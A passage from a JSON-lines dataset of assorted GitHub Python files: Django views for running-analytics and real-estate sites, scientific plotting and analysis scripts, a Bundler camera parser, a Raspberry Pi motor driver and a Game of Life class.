.graphs.lapsBarChart import lapsBarChart\nfrom .graphs.dashboardTable import dashboardTable\nfrom .graphs.dashboardBarChart import dashboardBarChart\nfrom .graphs.dashboardScheduleChart import dashboardScheduleChart\nfrom .graphs.trendsBarChart import trendsBarChart\n\nimport json\nimport datetime\nimport boto3\n\n@require_POST\ndef getPaceElevGraph(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n graph = paceElevGraph(activity, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef get3DModelGraph(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n graph = model3DGraph(activity, athlete)\n return 
HttpResponse(graph)\n\n@require_POST\ndef getMapThumbnail(request):\n activity = json.loads(request.body)\n graph = mapThumbnail(\n activity['streams']['latStream'],\n activity['streams']['lngStream']\n )\n return HttpResponse(graph)\n\n@require_POST\ndef getAnnotatedMap(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n graph = annotatedMap(athlete, activity)\n return HttpResponse(graph)\n\n@require_POST\ndef getPaceZonesGraph(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n if activity['isAmbulatory']:\n graph = paceZonesGraph(activity, athlete)\n else:\n graph = skiSpeedZonesGraph(activity, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef getGradeZonesGraph(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n graph = gradeZonesGraph(activity, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef getHeatmap(request):\n athleteId = json.loads(request.body)['athlete']\n athlete = Athlete.objects.get(pk=athleteId)\n client = boto3.client(\n 's3',\n region_name=settings.AWS_REGION_NAME,\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID,\n aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY\n )\n obj = client.get_object(\n Bucket=settings.AWS_HEATMAP_BUCKET_NAME,\n Key=f'heatmap-graph-html-{athlete.id}.html'\n )\n graph = obj['Body'].read().decode('utf-8')\n return HttpResponse(graph)\n\n@require_POST\ndef getlapsBarChartDevice(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n laps = getDeviceLaps(activity, athlete)\n graph = lapsBarChart(activity, laps, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef getlapsBarChartAuto(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n if activity['isAmbulatory']:\n laps = getAutoLaps(activity, athlete)\n else:\n laps = getSkiRuns(activity, athlete)\n graph = lapsBarChart(activity, laps, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef getDashboardTable(request):\n data = json.loads(request.body)\n athlete = Athlete.objects.get(pk=data['athlete'])\n fromDate = datetime.datetime.strptime(data['fromDate'], '%Y-%m-%d')\n toDate = datetime.datetime.strptime(data['toDate'], '%Y-%m-%d')\n table = dashboardTable(fromDate, toDate, athlete)\n return HttpResponse(table)\n\n@require_POST\ndef getDashboardBarChart(request):\n data = json.loads(request.body)\n athlete = Athlete.objects.get(pk=data['athlete'])\n fromDate = datetime.datetime.strptime(data['fromDate'], '%Y-%m-%d')\n toDate = datetime.datetime.strptime(data['toDate'], '%Y-%m-%d')\n metric = data['metric']\n graph = dashboardBarChart(athlete, metric, fromDate, toDate)\n return HttpResponse(graph)\n\n@require_POST\ndef getDashboardScheduleChart(request):\n data = json.loads(request.body)\n athlete = Athlete.objects.get(pk=data['athlete'])\n fromDate = datetime.datetime.strptime(data['fromDate'], '%Y-%m-%d')\n toDate = datetime.datetime.strptime(data['toDate'], '%Y-%m-%d')\n graph = dashboardScheduleChart(athlete, fromDate, toDate)\n return HttpResponse(graph)\n\n@require_POST\ndef getTrendsBarChart(request):\n data = json.loads(request.body)\n athlete = Athlete.objects.get(pk=data['athlete'])\n period = data['period']\n metric = data['metric']\n graph = trendsBarChart(athlete, metric, period)\n return 
HttpResponse(graph)\n","repo_name":"sfergusond/runcrunch","sub_path":"graph/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29771186193","text":"from django.http.response import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import redirect, render\nfrom .models import Inquiry, Listing, Realtor\nfrom .filters import ListingFilter\nfrom django.urls import reverse\nfrom .forms import InquiryForm\nfrom django.contrib.auth.decorators import login_required\n\ndef HomeView(request):\n\ttemplate = \"home.html\"\n\tlistings = Listing.objects.filter(is_published=True)\n\tmyfilter = ListingFilter(request.GET, queryset=listings)\n\tlistings = myfilter.qs\n\tcontext = {\n\t\t'results' : listings,\n\t\t'filter' : myfilter,\n\t}\n\n\treturn render(request, template, context)\n\ndef PropertyDetailView(request, pk):\n\ttemplate = \"property_details.html\"\n\ttry:\n\t\tproperty = Listing.objects.get(id=pk)\n\texcept:\n\t\treturn HttpResponse(\"Property does not exist\")\n\tcontext = {\n 'property' : property,\n\t}\n\n\treturn render(request, template, context)\n\n@login_required\ndef InquiryCreateView(request, pk):\n\ttemplate = \"inquirycreate.html\"\n\tproperty = Listing.objects.get(id=pk)\n\tcontacts = Inquiry.objects.filter(listing=property)\n\tinquiries = contacts.filter(user=request.user)\n\tif not inquiries:\n\t\tform = InquiryForm()\n\t\tif request.method == \"POST\":\n\t\t\tphone = request.POST.get(\"phone\")\n\t\t\tmessage = request.POST.get(\"message\")\n\t\t\tinquiry = Inquiry.objects.create(\n\t\t\t\tlisting=property,\n\t\t\t\tuser=request.user,\n\t\t\t\tphone=phone,\n\t\t\t\tmessage=message\n\t\t\t)\n\t\t\tinquiry.save()\n\t\t\treturn HttpResponseRedirect(reverse('details', args=[str(property.id)]))\n\t\tcontext = {\n\t\t\t'form' : form,\n\t\t\t'property' : property,\n\t\t}\n\n\t\treturn render(request, template, context)\n\telse:\n\t\treturn redirect('dashboard')\n\n@login_required\ndef DashboardView(request):\n\ttemplate = \"dashboard.html\"\n\tcontacts = Inquiry.objects.filter(user=request.user)\n\tcontext = {\n 'contacts' : contacts,\n\t}\n\t\n\treturn render(request, template, context)\n@login_required\ndef DeleteInquiryView(request, id):\n\tif request.method == \"POST\":\n\t\tinquiry = Inquiry.objects.filter(id=id)\n\t\tif inquiry.first().user == request.user:\n\t\t\tinquiry.delete()\n\t\t\treturn redirect('dashboard')\n\t\telse:\n\t\t\treturn redirect('dashboard')\n\telse:\n\t\treturn redirect('dashboard')\n\ndef AboutView(request):\n\ttemplate = \"about.html\"\n\trealtors = Realtor.objects.all()\n\tbest = realtors.filter(is_mvp=True).first()\n\tif best:\n\t\tcontext = {\n\t\t\t'realtors' : realtors,\n\t\t\t'best' : best,\n\n\t\t}\n\telse:\n\t\tcontext = {\n\t\t\t'realtors' : realtors,\n\n\t\t}\n\t\t\n\n\treturn render(request, template, context)","repo_name":"Nepul321/Real-estate-Django","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23633278551","text":"import argparse\nimport numpy as np\nimport h5py\nimport json\nimport string\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom matplotlib import gridspec\nfrom mpl_toolkits.basemap import Basemap\nimport colormaps\n\n\n\ndef plot_panel(\n filename,\n show_colorbar=True,\n xaxis='bottom',\n norm=None,\n 
cmap=None,\n annotation=None\n):\n with h5py.File(filename) as f:\n correction_factor = 1.0*f['cloud_incidence_2'][::]/f['cloud_incidence_1'][::]\n\n m = Basemap(\n llcrnrlon=-180,\n llcrnrlat=-90,\n urcrnrlon=180,\n urcrnrlat=90\n )\n im = m.imshow(correction_factor.T,\n # im = m.imshow((f['cloud_incidence_1'][::]/f['cloud_incidence_1_total'][::]).T,\n interpolation='nearest',\n norm=norm,\n cmap=cmap\n )\n # if show_colorbar:\n # m.colorbar(im, 'right', size='3%', pad='3%')\n m.drawcoastlines(linewidth=0.1)\n m.drawcountries(linewidth=0.1)\n m.drawparallels(np.arange(-90.,91.,20.), labels=[1,0,0,1], linewidth=0.1, color='#333333', fontsize=10)\n\n if xaxis == 'bottom':\n labels = [0, 0, 0, 1]\n elif xaxis == 'top':\n labels = [0, 0, 1, 0]\n else:\n labels = [0, 0, 0, 0]\n m.drawmeridians(np.arange(-180.,180.,30.), labels=labels, linewidth=0.1, color='#333333', fontsize=10)\n\n if annotation is not None:\n plt.annotate(\n annotation,\n xy=(0, 1),\n xytext=(5, -5),\n ha='left',\n va='top',\n xycoords='axes fraction',\n textcoords='offset points',\n weight='bold'\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Plot correction factor (multi)')\n parser.add_argument('-c', dest='config', help='config file')\n parser.add_argument('-o', dest='outfile', type=str, help='output plot')\n args = parser.parse_args()\n config = json.load(open(args.config))\n\n plt.figure(figsize=(8,12))\n plt.viridis()\n plt.rcParams['font.family'] = 'Open Sans'\n\n nrows = len(config['files'])\n\n gs = gridspec.GridSpec(\n nrows + 1,\n 1,\n wspace=0,\n hspace=0.15,\n height_ratios=(0.3, 0.3, 0.3, 0.015)\n )\n\n norm = mpl.colors.Normalize(0.2, 2)\n cmap = colormaps.parula\n\n for i, filename in enumerate(config['files']):\n plt.subplot(gs[i])\n\n if i == 0:\n xaxis = 'top'\n elif i == nrows - 1:\n xaxis = 'bottom'\n else:\n xaxis = None\n\n plot_panel(\n filename,\n xaxis=xaxis,\n show_colorbar=(i == 0),\n norm=norm,\n cmap=cmap,\n annotation=string.lowercase[i]\n )\n\n plt.annotate(\n config['labels'][i],\n xy=(-0.15, 0.5), xytext=(0, 0),\n xycoords=('axes fraction', 'axes fraction'),\n textcoords='offset points',\n size=14,\n ha='left',\n va='center',\n weight='bold'\n )\n\n cax = plt.subplot(gs[nrows])\n cb = mpl.colorbar.ColorbarBase(\n cax,\n orientation='horizontal',\n extend='both',\n cmap=cmap,\n norm=norm\n )\n cb.set_label('8.3 to 8 km cloud occurrence ratio (1)')\n\n if args.outfile:\n plt.savefig(args.outfile, bbox_inches='tight', pad_inches=0.5)\n else:\n plt.show()\n","repo_name":"peterkuma/clouds-ross-sea-2018","sub_path":"scripts/plot_correction_factor_multi.py","file_name":"plot_correction_factor_multi.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"19351697075","text":"def moveNameInDB(key, dbCursor):\n dbCursor.execute(\"select movename from moves where movename=? collate nocase\", (key,))\n moves = dbCursor.fetchall()\n\n if not moves:\n return False\n return True\n\n\nasync def getCharMoves(char, dbCursor):\n dbCursor.execute(\"select movename from moves where charname=? collate nocase\", (char,))\n moves = dbCursor.fetchall()\n\n if not moves:\n return None\n\n moveString = \"```\"\n for move in moves:\n moveString = moveString + (move[0]) + \"\\n\"\n moveString = moveString + \"```\"\n\n return moveString\n\n\ndef getFrameData(char, move, dbCursor):\n \"\"\"Function returning a list of strings containing framedata\n for each move found in the database. 
If a precise result is found,\n return that one. If not, return a relaxed result where only similar\n moves are being found.\"\"\"\n\n dbCursor.execute(\"select * from moves where charname=? collate nocase and\\\n movename =? collate nocase\", (char, move))\n\n retVal = dbCursor.fetchall()\n\n if not retVal:\n #Nothing found with precise search, relax the movename reqs\n dbCursor.execute(\"select * from moves where charname=? collate nocase and\\\n movename like ? collate nocase\", (char, '%' + move + '%'))\n retVal = dbCursor.fetchall()\n\n return retVal\n","repo_name":"prki/eddiebot","sub_path":"DbReader.py","file_name":"DbReader.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2647991512","text":"import os\nimport logging\n\nimport numpy as np\n\nfrom alias.io.numpy_io import load_npy\nfrom alias.io.checkfile_io import (\n save_checkfile\n)\nfrom alias.src.positions import batch_coordinate_loader\nfrom alias.src.surface_parameters import SurfaceParameters\nfrom alias.src.intrinsic_sampling_method import (\n create_intrinsic_surfaces\n)\nfrom alias.src.intrinsic_analysis import (\n create_intrinsic_positions_dxdyz,\n create_intrinsic_den_curve_hist,\n av_intrinsic_distributions\n)\nfrom alias.io.utilities import make_directory\nfrom alias.src.utilities import create_file_name, join_str_values\n\nlog = logging.getLogger(__name__)\n\n\ndef run_alias(trajectory, alias_options, checkpoint=None, topology=None):\n \"\"\"Peform ALIAS on given trajectory,\"\"\"\n\n # Obtain directory for trajectory and create analysis\n # directories\n traj_dir = os.path.dirname(trajectory)\n\n alias_dir = os.path.join(traj_dir, 'alias_analysis')\n data_dir = os.path.join(alias_dir, 'data')\n figure_dir = os.path.join(alias_dir, 'figures')\n\n make_directory(alias_dir)\n make_directory(data_dir)\n make_directory(figure_dir)\n\n # Parse file name to obtain base path for analysis\n # files\n file_name, _ = os.path.splitext(trajectory)\n file_name = os.path.basename(file_name)\n\n # Create a checkpoint file to save intrinsic surface\n # parameters\n if checkpoint is None:\n checkpoint = os.path.join(\n alias_dir, file_name + '_chk.json')\n\n surf_param = SurfaceParameters.from_json(checkpoint)\n\n log.info(\"Loading trajectory file {} using {} topology\".format(\n trajectory, topology))\n surf_param.load_traj_parameters(\n trajectory, topology)\n\n surf_param.select_residue()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n surf_param.select_masses()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n surf_param.select_center_of_mass()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n com_ref = create_file_name([\n surf_param.com_mode,\n join_str_values(surf_param.com_sites)]\n )\n file_name = f\"{file_name}_{com_ref}\"\n\n surf_param.select_orientation_vector()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n pos_dir = os.path.join(data_dir, 'pos')\n if not os.path.exists(pos_dir):\n os.mkdir(pos_dir)\n pos_file_name = os.path.join(pos_dir, file_name)\n\n try:\n mol_traj = load_npy(pos_file_name + f'{surf_param.n_frames}_mol_traj')\n cell_dim = load_npy(pos_file_name + f'{surf_param.n_frames}_cell_dim')\n except (FileNotFoundError, IOError):\n\n mol_traj, com_traj, cell_dim, mol_vec = batch_coordinate_loader(\n trajectory, surf_param, topology=topology\n )\n\n np.save(pos_file_name + 
f'{surf_param.n_frames}_mol_traj', mol_traj)\n np.save(pos_file_name + f'{surf_param.n_frames}_mol_vec', mol_vec)\n np.save(pos_file_name + f'{surf_param.n_frames}_com_traj', com_traj)\n np.save(pos_file_name + f'{surf_param.n_frames}_cell_dim', cell_dim)\n\n surf_param.select_mol_sigma()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n surf_param.n_frames = mol_traj.shape[0]\n mean_cell_dim = np.mean(cell_dim, axis=0)\n surf_param.cell_dim = mean_cell_dim.tolist()\n\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n print(f\"Simulation cell xyz dimensions in Angstoms: \"\n f\"{surf_param.area}\\n\")\n\n print(\"\\n------STARTING INTRINSIC SAMPLING-------\\n\")\n print(\n \"Max wavelength = {:12.4f} sigma \"\n \"Min wavelength = {:12.4f} sigma\".format(\n surf_param.q_max, surf_param.q_min)\n )\n print(\"Max frequency qm = {:6d}\".format(\n surf_param.q_m))\n\n surf_param.select_pivot_density(file_name, data_dir)\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n freq_range = range(1, surf_param.q_m+1)\n print(\"\\nResolution parameters:\")\n print(\"\\n{:12s} | {:12s} | {:12s}\".format(\n 'qu', \"lambda (sigma)\", \"lambda (nm)\"))\n print(\"-\" * 14 * 5)\n\n for q_u in freq_range:\n print(\"{:12d} | {:12.4f} | {:12.4f}\".format(\n q_u,\n surf_param.wavelength(q_u),\n surf_param.wavelength(q_u) * surf_param.mol_sigma / 10))\n print(\"\")\n\n create_intrinsic_surfaces(\n data_dir, file_name, mean_cell_dim, surf_param.q_m,\n surf_param.n_pivots, surf_param.phi,\n surf_param.mol_sigma, surf_param.n_frames,\n recon=surf_param.recon, ncube=surf_param.n_cube,\n vlim=surf_param.v_lim, tau=surf_param.tau,\n max_r=surf_param.max_r,\n ow_coeff=alias_options.ow_coeff,\n ow_recon=alias_options.ow_recon)\n\n create_intrinsic_positions_dxdyz(\n data_dir, file_name, surf_param.n_mol,\n surf_param.n_frames, surf_param.q_m,\n surf_param.n_pivots, surf_param.phi,\n mean_cell_dim,\n recon=surf_param.recon,\n ow_pos=alias_options.ow_intpos)\n\n create_intrinsic_den_curve_hist(\n data_dir, file_name, surf_param.q_m, surf_param.n_pivots,\n surf_param.phi, surf_param.n_frames,\n surf_param, surf_param.n_slice,\n surf_param.cell_dim,\n recon=surf_param.recon,\n ow_hist=alias_options.ow_hist)\n\n av_intrinsic_distributions(\n data_dir, file_name, surf_param.cell_dim,\n surf_param.n_slice, surf_param.q_m,\n surf_param.n_pivots, surf_param.phi,\n surf_param.n_frames, surf_param.n_frames,\n recon=surf_param.recon,\n ow_dist=alias_options.ow_dist)\n\n print(\"\\n---- ENDING PROGRAM ----\\n\")\n","repo_name":"franklongford/ALIAS","sub_path":"alias/src/run_alias.py","file_name":"run_alias.py","file_ext":"py","file_size_in_byte":5726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9608328771","text":"#!/usr/bin/python3\n\ndef max_integer(my_list=[]):\n\n if len(my_list) < 1:\n return None\n else:\n max_value = my_list[0]\n for index, num in enumerate(my_list):\n if num > max_value:\n max_value = num\n return max_value\n","repo_name":"gbabohernest/alx-higher_level_programming","sub_path":"0x03-python-data_structures/9-max_integer.py","file_name":"9-max_integer.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31089283361","text":"import numpy as np, os, cv2\nfrom functions import *\n\ndef parse_bundler(fname,img_shape):\n with open(fname, \"r\") as f:\n f.readline() 
# Read Bundler Version Line\n ncams = int(f.readline().split()[0])\n focals, Rt, pt_tracks = [], [], []\n for idx in range(ncams):\n focals.append(float(f.readline().split()[0]))\n R = np.array([list(map(float, f.readline().split())) for x in range(3)])\n t = np.array(list(map(float, f.readline().split())))\n Rt.append((R, t))\n while True:\n line = f.readline()\n if line is None or len(line.rstrip()) == 0:\n break\n X = np.array(list(map(float, line.split())))\n f.readline() # Ignore color values\n projs = f.readline().split()\n track = []\n for idx in range(int(projs[0])):\n frame = int(projs[1 + 4*idx]) # Ignore SIFT keypoint number\n x = img_shape[1]/2. + float(projs[3 + 4*idx])\n y = img_shape[0]/2. + float(projs[4 + 4*idx])\n track.append((frame, np.array([x,y], np.float64)))\n pt_tracks.append((X, track))\n return focals, Rt, pt_tracks\n\nclass Bundler:\n def __init__(self, bundler_file, img_files, img_shape, max_dim = 1000, frame_subset = None, cams_file = None):\n self.bundler_file = bundler_file\n self.img_shape = img_shape\n if max_dim is None:\n self.scale = 1.\n else:\n self.scale = min(float(max_dim+0.4) / np.array(self.img_shape[:2], np.float64))\n if not os.path.exists(self.bundler_file):\n raise RuntimeError(\"Bundler Path does not exist: {}\".format(self.bundler_file))\n focals, Rt, tracks = parse_bundler(self.bundler_file, self.img_shape)\n if len(focals) != len(img_files):\n raise RuntimeError(\"Bundler camera count ({0}) not agreeing with specified camera count ({1})\".format(len(focals),len(img_files)))\n frames_ok = np.nonzero(focals)[0].tolist()\n if frame_subset is not None:\n frames_ok = list(set(frames_ok).intersection(frame_subset))\n if cams_file is not None:\n if not os.path.exists(cams_file):\n raise RuntimeWarning(\"Not using good cams - File not found: {}\".format(cams_file))\n with open(cams_file,\"r\") as camf:\n good_cams = list(map(int,camf.readlines()))\n frames_ok = list(set(frames_ok).intersection(good_cams))\n frames_ok = sorted(frames_ok)\n self.img_files = [img_files[idx] for idx in frames_ok]\n self.imgs = dict([(f,cv2.resize(load_img(f,1), (0,0), fx=self.scale, fy=self.scale)) for f in self.img_files])\n if len(img_files) == 0:\n raise RuntimeError('SfM failed: No good cameras')\n self.Ks = np.zeros((len(img_files), 3, 3))\n self.Rs = np.zeros((len(img_files), 3, 3))\n self.ts = np.zeros((len(img_files), 3))\n for idx, frame in enumerate(frames_ok):\n K = -np.array([[-self.scale*focals[frame], 0., -0.5 + self.scale*self.img_shape[1]/2.,],[0., self.scale*focals[frame], -0.5 + self.scale*self.img_shape[0]/2.,],[0., 0., 1.]])\n self.Ks[idx] = K\n self.Rs[idx], self.ts[idx] = Rt[frame]\n\n def get_img(self, frame): return self.imgs[self.img_files[frame]].copy()\n \n def P(self, frame): return np.dot(self.Ks[frame], np.hstack([self.Rs[frame], self.ts[frame, :, np.newaxis]]))\n\n def center(self, frame): return -np.dot(self.Rs[frame].T, self.ts[frame])\n\n def project(self, frame, X):\n X = np.asarray(X.T)\n homog_X = np.concatenate([X, [1.]]) if X.ndim == 1 else np.vstack([X, np.ones(X.shape[1])])\n x = np.dot(self.P(frame), homog_X)\n y = x[:-1] / x[-1]\n return y.T\n\nif __name__ == \"__main__\":\n data_path = \"./Test Data/walden-tree3/\"\n Bundler(data_path + \"bundle/bundle.out\", get_jpg_files(data_path), 
(3888,2592,3))","repo_name":"abdur75648/COL-780-Assignments","sub_path":"Project/src/bundler.py","file_name":"bundler.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12449447670","text":"# 해시 _ 베스트엘범 _level3 (통과)\ndef solution(gen, play):\n # mulist = 장르 : [(재생수, 고유번호)]\n # total = 장르 : 총 재생수 \n answer, mulist, total = [], dict(), dict()\n g_len = len(gen) # 장르의 갯수\n\n for i in range(g_len) :\n if gen[i] in mulist: # 장르 key가 존재하면?\n mulist[gen[i]].append((play[i], i)) # (재생수, 고유번호)\n total[gen[i]] = total[gen[i]] + play[i] # 총 재생 수\n else : # 장르 key가 존재안하면?\n mulist[gen[i]] = [(play[i],i)]\n total[gen[i]] = play[i]\n \n # total 을 정렬 _ 재생수를 기준으로 내림차순 정렬\n total_sort_list = sorted(list(total.items()), key=lambda x :-x[1])\n\n for gen, j in total_sort_list:\n if len(mulist[gen]) == 1: # 조건1 ) 곡이 한개라면, 하나만 넣기 **\n answer.append(mulist[gen][0][1])\n else : \n # 조건2 ) 재생 수가 같다면 고유번호 낮은 순 넣기 **\n mulist[gen].sort(key=lambda x:(-x[0], x[1])) \n answer.append(mulist[gen][0][1])\n answer.append(mulist[gen][1][1])\n\n return answer\n\n# 조금 수정해보기\ndef solution2(gen, play):\n answer, mulist, total = [], dict(), dict()\n\n for i, (g, p) in enumerate(zip(gen, play)) : # enumerate와 zip을 사용하기 **\n if gen[i] in mulist: \n mulist[g].append((p,i)) \n total[g] += p # += 연산자 사용하기 **\n else : \n mulist[g] = [(p,i)]\n total[g] = p\n \n for gen, j in sorted(total.items(), key=lambda x :-x[1]):\n for p, go in sorted(mulist[gen], key=lambda x:(-x[0], x[1]))[:2] :\n answer.append(go)\n \n\n # print(answer)\n return answer\n\n\nif __name__ == '__main__':\n genres = [\"classic\", \"pop\", \"classic\", \"classic\", \"pop\"]\t\n plays = [500, 2500, 150, 800, 2500]\t\n solution(genres, plays)\n solution2(genres, plays)","repo_name":"yujing-kim/algorithm_coding_test","sub_path":"ps_python/programmers/2022/hash_bestalbum.py","file_name":"hash_bestalbum.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9857137631","text":"import RPi.GPIO as GPIO\n\nPWM_FREQ = 40\nLEFT_PWM = 11\nRIGHT_PWM = 3\n\nLEFT_DIR_1 = 13\nLEFT_DIR_2 = 15\n\nRIGHT_DIR_1 = 5\nRIGHT_DIR_2 = 7\n\nMAX_SPEED_LEFT = 0.1142 * 2\nMAX_SPEED_RIGHT = 0.1142 * 2\nMAX_ALLOWED_POWER = 0.5\nWHEELBASE = 0.2\n\n\nclass Driver(object):\n def __init__(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(LEFT_PWM, GPIO.OUT)\n GPIO.setup(RIGHT_PWM, GPIO.OUT)\n GPIO.setup(LEFT_DIR_1, GPIO.OUT)\n GPIO.setup(LEFT_DIR_2, GPIO.OUT)\n GPIO.setup(RIGHT_DIR_1, GPIO.OUT)\n GPIO.setup(RIGHT_DIR_2, GPIO.OUT)\n\n self.left_pwm = GPIO.PWM(LEFT_PWM, PWM_FREQ)\n self.right_pwm = GPIO.PWM(RIGHT_PWM, PWM_FREQ)\n\n self.left_pwm.start(0)\n self.right_pwm.start(0)\n\n def set_speed(self, v_left, v_right):\n # Cap the max speed, so that you do not set values larger than allowed\n v_left = max(min(v_left, MAX_SPEED_LEFT), -MAX_SPEED_LEFT)\n v_right = max(min(v_right, MAX_SPEED_RIGHT), -MAX_SPEED_RIGHT)\n\n # Transform speed to PWM\n v_left /= MAX_SPEED_LEFT / MAX_ALLOWED_POWER\n v_right /= MAX_SPEED_RIGHT / MAX_ALLOWED_POWER\n\n # Controll the motor direction correctly\n if v_left >= 0:\n GPIO.output(LEFT_DIR_1, GPIO.HIGH)\n GPIO.output(LEFT_DIR_2, GPIO.LOW)\n else:\n GPIO.output(LEFT_DIR_1, GPIO.LOW)\n GPIO.output(LEFT_DIR_2, GPIO.HIGH)\n v_left = -v_left\n\n if v_right >= 0:\n GPIO.output(RIGHT_DIR_1, GPIO.HIGH)\n GPIO.output(RIGHT_DIR_2, GPIO.LOW)\n else:\n GPIO.output(RIGHT_DIR_1, 
GPIO.LOW)\n GPIO.output(RIGHT_DIR_2, GPIO.HIGH)\n v_right = -v_right\n\n # Actually set the duty for the motor\n self.left_pwm.ChangeDutyCycle(v_left)\n self.right_pwm.ChangeDutyCycle(v_right)\n\n def kill(self):\n # When killing reseting the pwm so the motors deinitialize\n self.left_pwm.stop()\n self.right_pwm.stop()\n GPIO.cleanup()\n","repo_name":"SimpleRobots/alice-hardware","sub_path":"pwm_drive.py","file_name":"pwm_drive.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6074655937","text":"import sys\n\nimport pygame\nfrom pygame.constants import QUIT\nfrom pygame.display import update\n\nfrom settings import Settings\nfrom cell import Cell\n\nclass GameOfLife:\n \"\"\"Overall class to manage game assets and behavior\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the game and create game resources\"\"\"\n pygame.init()\n self.settings = Settings()\n self.number_cells_x = int(input(\"Enter number of cells in a row: \"))\n self.cell_width = float(self.settings.screen_width // self.number_cells_x)\n #print(self.cell_width)\n self.number_cells_y = int(self.settings.screen_height // self.cell_width)\n\n self.screen = pygame.display.set_mode((self.settings.screen_width,self.settings.screen_height))\n pygame.display.set_caption(\"Game of Life\")\n\n self.cells = []\n self.to_be_updated = []\n self._create_cells()\n\n self.bg_colour = (self.settings.bg_colour)\n self.waiting = True\n \n def _create_cell(self,row_number,cell_number):\n \"\"\"Creates a cell at given position\"\"\"\n cell = Cell(self)\n cell.x = cell_number * self.cell_width\n cell.y = row_number * self.cell_width\n cell.rect.x = cell.x\n cell.rect.y = cell.y\n return cell\n\n def _create_cells(self):\n \"\"\"Create all cells\"\"\"\n for row_number in range(self.number_cells_y):\n row_cells = []\n row_to_be_updated = []\n for cell_number in range(self.number_cells_x):\n row_cells.append(self._create_cell(row_number,cell_number))\n row_to_be_updated.append(False)\n self.cells.append(row_cells)\n self.to_be_updated.append(row_to_be_updated)\n\n def run_game(self):\n \"\"\"Start the main loop for the game\"\"\"\n while True:\n self._check_event()\n self._update_screen()\n \n def _check_event(self):\n \"\"\"Checks for input from keyboard and mouse\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self.waiting = not self.waiting\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if self.waiting:\n x,y = pygame.mouse.get_pos()\n cell_addr_y = int(y/self.cell_width)\n cell_addr_x = int(x/self.cell_width)\n self.cells[cell_addr_y][cell_addr_x].update()\n\n def _get_neighbours(self,row_number,col_number):\n alive_neighbours = 0\n if row_number > 0:\n if self.cells[row_number-1][col_number].get_status():\n alive_neighbours += 1\n if row_number < self.number_cells_y -1:\n if self.cells[row_number+1][col_number].get_status():\n alive_neighbours += 1\n if col_number > 0:\n if self.cells[row_number][col_number-1].get_status():\n alive_neighbours += 1\n if col_number < self.number_cells_x -1:\n if self.cells[row_number][col_number+1].get_status():\n alive_neighbours += 1\n if row_number > 0 and col_number > 0:\n if self.cells[row_number-1][col_number-1].get_status():\n alive_neighbours += 1\n if row_number > 0 and col_number < self.number_cells_x -1:\n if 
